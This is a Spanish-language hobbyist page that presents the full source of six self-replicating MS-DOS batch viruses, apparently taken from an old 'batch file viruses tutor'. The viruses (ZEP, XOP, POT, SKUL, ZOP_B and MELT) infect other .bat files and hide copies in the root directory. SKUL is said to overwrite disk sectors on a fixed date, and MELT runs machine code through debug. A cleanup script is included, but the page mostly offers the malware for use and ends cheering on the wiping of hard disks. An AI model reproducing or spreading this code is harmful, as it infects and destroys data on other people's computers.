VIRUS BATCH
Introducción:
Las personas generalmente creen que los virus batch no son una forma confiable de infectar. Bueno. Te dejo que opines tu mismo con esto, es cierto que unos virus no son chingones, pero aqui no es necesario saber de algún lenguaje de programación, solo debes de saber hacer Archivos.bat. :)
Los virus se supone que son fáciles de limpiar. :( Agarra un mendigo editor y orale !
Aqui te pongo 5 virus que me encontré por ahí. Se supone que si sirven.
Características
* Infectan únicamente archivos batch que no estén protegidos.
* No afectan el funcionamiento de los batch que infecta, se ejecutan normalmente, pero el virus toma control de el despues de que el batch acabo de hacer todas sus ejecuciones.
* Se necesita MS-Dos 5 o superior ( no se... :)
LOS VIRUS BATCH
ZEP (165) - El virus mas pequeño hasta ahora.
------------ZEP.BAT---------------------
@echo off%[ZeP]%
if not exist %0.bat goto ZeP
for %%f in (*.bat ..\*.bat) do set ZeP=%%f
find /i "ZeP"<%ZeP%>nul
if errorlevel 1 find "ZeP"<%0.bat>>%ZeP%
:ZeP
---------corta aqui--------------------------
XOP (361) - Infecta 2 batchs por ejecución.
-------------------------------- XOP.BAT ----------------------------------
@echo off%[XoP]%
if '%XoP%=='11 goto XoP2
if '%2=='_ goto XoP1
if exist C:\XoP.bat goto XoP
if not exist %0.bat goto XoP2
find "XoP"<%0.bat>C:\XoP.bat
attrib C:\XoP.bat +h
:XoP
for %%v in (*.bat ..\*.bat) do call C:\XoP %%v _
set XoP=
goto XoP2
:XoP1
find /i "XoP"<%1>nul
if not errorlevel 1 goto XoP2
type C:\XoP.bat>>%1
set XoP=%XoP%1
:XoP2
------------corta aqui------------------
POT (685) - Infecta 1 batch por ejecución, si no puede infectar ninguno, pone 2 bombas ANSI.
-------------------------------- POT.BAT----------------------------------
@echo off%_PoT%
if '%PoT%=='I goto PoTz
if '%1=='_ goto PoTi
if exist C:\PoT.bat goto PoT
if not exist %0.bat goto PoTz
find "PoT"<%0.bat>C:\PoT.bat
attrib C:\PoT.bat +h
:PoT Makes You Feel Goodz
for %%f in (*.bat ..\*.bat C:\*.bat) do call C:\PoT.bat _ %%f
if '%PoT%=='I goto PoTf
set PoT=
echo %PoT%[32;" Estas paralizado ! "p
echo %PoT%[96;" C:\PoT";13p%PoT%[2A
echo.%_PoT%|time|find "00">nul
if errorlevel 1 goto PoTf
echo %PoT%[1A%PoT%[s%PoT%[1;37;44m
echo %PoT%[3;9H Dejame salir de aqui ! %PoT%[0m%PoT%[u
:PoTf gold
set PoT=
goto PoTz
:PoTi nfect
find /i "PoT"<%2>nul
if not errorlevel 1 goto PoTz
type C:\PoT.bat>>%2
set PoT=I
:PoTz
----------------------corta aqui----------------------------
SKUL (497) - Este es un virus PELIGROSO ! XD, es el que mas me ha gustado. Sobrescribe cerca de 8000 sectores del disco duro el dia 20 de cada mes. TEN CUIDADO! ( no juegues con fuego :)
---------------------------------- SKUL.BAT-----------------------------------
:: [8mSKuL
@echo off%[SKuL]%
echo.|date|find "20">nul%[SKuL]%
if errorlevel 1 goto SKuL1
echo SKuL Fregando el disco duro...
::echo � � Ö-&->SKuL.com
::SKuL
:SKuL1 [6A2
if exist C:\SKuL goto SKuL2
if not exist %0.bat goto SKuL
find "SKuL"<%0.bat>C:\SKuL
attrib C:\SKuL +h
:SKuL2 [5A
set SKuL=C:\AUTOEXEC.BAT
for %%f in (D:*.bat C:*.bat ..\*.bat) do set SKuL=%%f
if not exist %SKuL% goto SKuL
find /i "SKuL"<%SKuL%>nul
if errorlevel 1 type C:\SKuL>>%SKuL%
set SKuL=
:SKuL [7A [0m
---------------------corta aqui--------------------------
ZOP_B (615) - Infecta 2 batchs por ejecución. No es muy impresionante no veras mucho despues de su ejecución.
------------------------------- ZOP_B.BAT----------------------------------
@echo off
:: [8m --- [ZoP_B] Batch Infector ---
if '%2=='ZoP_ goto ZoP_1
if '%1=='ZoP_ echo ["`";"`"p
:: ["`";" ZoP_B ZoP_";13p
:: [4AZoP_
if exist c:\ZoP_B.bat goto ZoP_
if not exist %0.bat goto ZoP_2
echo @echo Off>c:\ZoP_B.bat
find "ZoP_"<%0.bat>>c:\ZoP_B.bat
attrib c:\ZoP_B.bat +h
:: [6AZoP_
:ZoP_
for %%v in (*.bat) do call c:\ZoP_B %%v ZoP_
if '%ZoP_%==' for %%v in (..\*.bat) do call c:\ZoP_B %%v ZoP_
set ZoP_=
goto ZoP_2
:: [6AZoP_
:ZoP_1
if '%ZoP_%=='11 goto ZoP_2
find "ZoP_"<%1>nul
if not errorlevel 1 goto ZoP_2
type c:\ZoP_B.bat>>%1
set ZoP_=%ZoP_%1
:ZoP_2
::ZoP_ [7A [0m
-------------------------corta aqui---------------------------------
Las bombas ANSI solo funcionaran si ANSI.SYS esta cargado en el memoria.
Todos los virus excepto ZEP se mantienen con una copia en la raíz del disco duro.
BATCH VIRUS REMOVER
Este archivo limpiara los virus batch de los que vimos atrás en el documento.
Básicamente, quita todas las líneas que contengan una cadena de caracteres especifica provista por el archivo. Es innecesario el decir que si lo llamas con la cadena de caracteres incorrecta reducirá tus archivos batch a una puta mierda:) , Así que ten cuidado, si no tienes la necesidad de usarlo, mejor.
Ha sido escrito para uso en MS-Dos 6 o mayor, (o por lo menos el archivo CHOICE.COM), es requerido porque el removedor pide la confirmación de cada archivo antes de limpiarlo. Así que tu no debes limpiar un archivo original sino estas seguro.
Para usarlo, (yo no lo he usado, así que no me hago responsable:), Determina que tipo de cadena de caracteres quieres limpiar, por ejemplo: Si yo tengo el un virus batch que contenga 'GreeZ' en cada línea (aqui voy otra vez) como lo siguiente:
::
:: Archivo infectado
::
ctty nul%_GeeZ%
for %%a in (C:*.bat ..\*.bat) do set GeeZ=%%a
find "GeeZ"<%GeeZ%
if errorlevel 1 find "GeeZ"<%0.BAT>>%GeeZ%
ctty con%_GeeZ%
Para remover eso, solo pon "CLEANBAT GeeZ".
---------------------------- CLEANBAT.BAT----------------------------------
@echo off
if '%1=='%temp% goto remove
if exist C:\DOS\CHOICE.COM goto start
echo Este archivo necesita CHOICE.COM en C:\DOS!
:start
echo **** REMOVEDOR DE VIRUS BATCH ****
echo.
echo Cuidado! Si la llave no es única destruirá archivos!
echo Sintax: CLEANBAT llave1 [llave2] donde llave1 es la llave
echo UNICA que identificara al virus.
echo.
set ks=%1
set is=%2
if '%ks%==' goto exit
if '%is%==' set is=%ks%
if '%temp%==' set temp=C:\
echo Proceder a remover %ks% de archivos que contienen %is%. Si?
choice /c:yn>nul
if errorlevel 2 goto exit
for %%v in (*.bat) do call %0 %temp% %%v
if exist rem$$_ del rem$$_
goto exit
:remove
find "%is%"<%2>nul
if errorlevel 1 goto done
echo Found in %2 - remove?
choice /c:yn>nul
if errorlevel 2 goto done
find /v "%ks%"<%2>rem$$_
copy rem$$_ %2>nul
goto done
:exit
set is=
set ks=
:done
-------------------------------corta aqui-----------------------------
Otra forma de limpiar archivos bat infectados por un virus batch es cargar el archivo en un editor ( como el edit de MS-dos ) e ir quitando las líneas añadidas al programa, recuerda que hay unos que tiene una copia la Raiz con el atributo de ocultos, solo usa ATTRIB filename -s -r -h y elimínalos.
Despedida:
Ha ! Estos 5 virus se me hacen un poco pequeños y casi inofensivos.
Este es la mejor, que lo disfruten...
----------------------( VIRUS MELT_ )------------------------------
@if not '%0==' if '%_melt%==' goto meltbeg
::---- dummy host --------
@echo off
echo Hello World!
::---- end dummy host ----
@goto MeLTend [MeLT_2a]
:MeLTbeg
@echo off%_MeLT%
if '%1=='MeLT goto MeLT%2
if not exist %comspec% set comspec=%_MeLT%command
%comspec% /e:5000 /c %0 MeLT vir
set MeLTcl=%1 %2 %3 %4 %5 %6 %7 %8 %9
call %0 MeLT rh
set _MeLT=
set MeLTcl=
goto MeLTend
:MeLTrh
set _MeLT=x
%0 %MeLTcl%
:MeLTvir
set MeLTH=%0
if not exist %_MeLT%%temp%\nul set temp=%tmp%
if exist %temp%\MeLT_2a goto MeLTrun
%0 MeLT fnd . %path%
:MeLTfnd
shift%_MeLT%
if '%2==' exit MeLT
set MeLT=%2\%MeLTH%.bat
if not exist %MeLT% set MeLT=%2\%MeLTH%
if not exist %MeLT% set MeLT=%2%MeLTH%.bat
if not exist %MeLT% set MeLT=%2%MeLTH%
if not exist %MeLT% goto MeLTfnd
find "MeLT"<%MeLT%>%temp%\MeLT_2a
attrib %temp%\MeLT_2a +h
:MeLTrun
%MeLTH% MeLT s . .. %path%
:MeLTs
shift%_MeLT%
if '%2==' exit MeLT
for %%a in (%2\*.bat %2*.bat) do call %MeLTH% MeLT inf %%a
goto MeLTs
:MeLTinf
find /i "MeLT"<%3>nul
if not errorlevel 1 goto MeLTno
echo @if not '%%0==' if '%%_melt%%==' goto meltbeg>MeLT.t
type %3>>MeLT.t
echo.>>MeLT.t
type %temp%\MeLT_2a>>MeLT.t
move MeLT.t %3>nul
exit MeLT
:MeLTact - flash-melt screen text then put back to normal
echo e 100 BA D0 07 BB 00 B8 8E C3 8B CA 33 FF 26 8B 05 FE>MeLT.t
echo e 110 C0 FE C4 26 89 05 47 47 E2 F2 FE 06 24 01 75 E8>>MeLT.t
echo e 120 B4 4C CD 21 00>>MeLT.t
echo g>>MeLT.t
debug<MeLT.t>nul
del MeLT.t
exit MeLT
:MeLTno
set MeLTC=%MeLTC%1
if %MeLTC%==1111111111 goto MeLTact
:MeLTend
----------------------------( FIN )-----------------------------------
Originalmente en : Batch file viruses tutor 1.
Ok , eso es todo por hoy.... STAY KILLING HARD DISKS !!
Volver